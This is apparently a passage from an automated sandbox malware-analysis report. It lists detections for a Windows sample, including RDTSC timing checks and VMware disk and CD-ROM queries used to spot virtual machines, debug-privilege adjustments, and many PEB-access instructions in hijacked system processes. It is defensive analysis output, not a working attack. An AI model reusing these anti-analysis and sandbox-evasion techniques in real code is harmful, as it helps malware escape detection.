          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\SysWOW64\DpiScaling.exeRDTSC instruction interceptor: First address: 0000000072488604 second address: 000000007248860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\DpiScaling.exeRDTSC instruction interceptor: First address: 000000007248899E second address: 00000000724889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 0000000000808604 second address: 000000000080860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 000000000080899E second address: 00000000008089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\logagent.exeRDTSC instruction interceptor: First address: 0000000072488604 second address: 000000007248860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\logagent.exeRDTSC instruction interceptor: First address: 000000007248899E second address: 00000000724889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000003288604 second address: 000000000328860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 000000000328899E second address: 00000000032889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F96DE6 rdtsc
          Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\SysWOW64\DpiScaling.exeAPI coverage: 5.6 %
          Source: C:\Windows\SysWOW64\DpiScaling.exeAPI coverage: 4.6 %
          Source: C:\Windows\SysWOW64\DpiScaling.exeProcess information queried: ProcessInformation
          Source: explorer.exe, 00000006.00000000.746235416.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.722681166.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.746235416.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.725780323.000000000A716000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAa
          Source: explorer.exe, 00000006.00000000.805412089.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000006.00000000.725780323.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000006.00000000.725780323.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F96DE6 rdtsc
          Source: C:\Windows\SysWOW64\DpiScaling.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\DpiScaling.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\logagent.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FD6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FD6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FD6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05028D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_0501E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05003D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F6849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F7746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FEC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FEC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_050205AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_050205AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F8A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F8BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_0501FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_0501FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_0501FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_0501FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05008DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FD6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FD6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FD6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FD6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05011C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05011C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05011C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05011C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05011C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05011C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05011C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05011C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05011C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05011C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05011C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05011C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05011C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05011C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_0502740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_0502740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_0502740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F6D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F6D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FD6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FD6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FD6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FD6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FD6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FD6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F81DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F81DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F81DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F835A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F8FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F8FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F82581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F82581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F82581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F82581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F52D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F52D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F52D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F52D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F52D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F7C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F7C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F77D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F93D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FD3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F84D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F84D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F84D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F5AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FDA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05028CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_050114FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_0502070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_0502070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F676E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F816E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F836CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F98EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FD46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05028F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FEFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F7AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F7AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F7AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F7AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F7AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F6766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F5E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F8A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F8A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F5C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F5C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F5C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F88E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05011608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F937F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_0500FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_0501AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_0501AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F68794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FD7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FD7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FD7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F6FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05020EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05020EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05020EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F6EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_0500FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F8E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05028ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F54F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F54F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F7F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FEFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FEFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F8A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F8A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F540E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F540E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F540E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F558EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FEB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F8F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F8F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F8F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F990AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F59080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FD3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FD3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_050149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_050149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_050149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_050149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F70050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F70050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F7A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F7A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F7A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F7A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FD7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FD7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FD7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F5B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F5B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F5B1E1 mov eax, dword ptr fs:[00000030h]
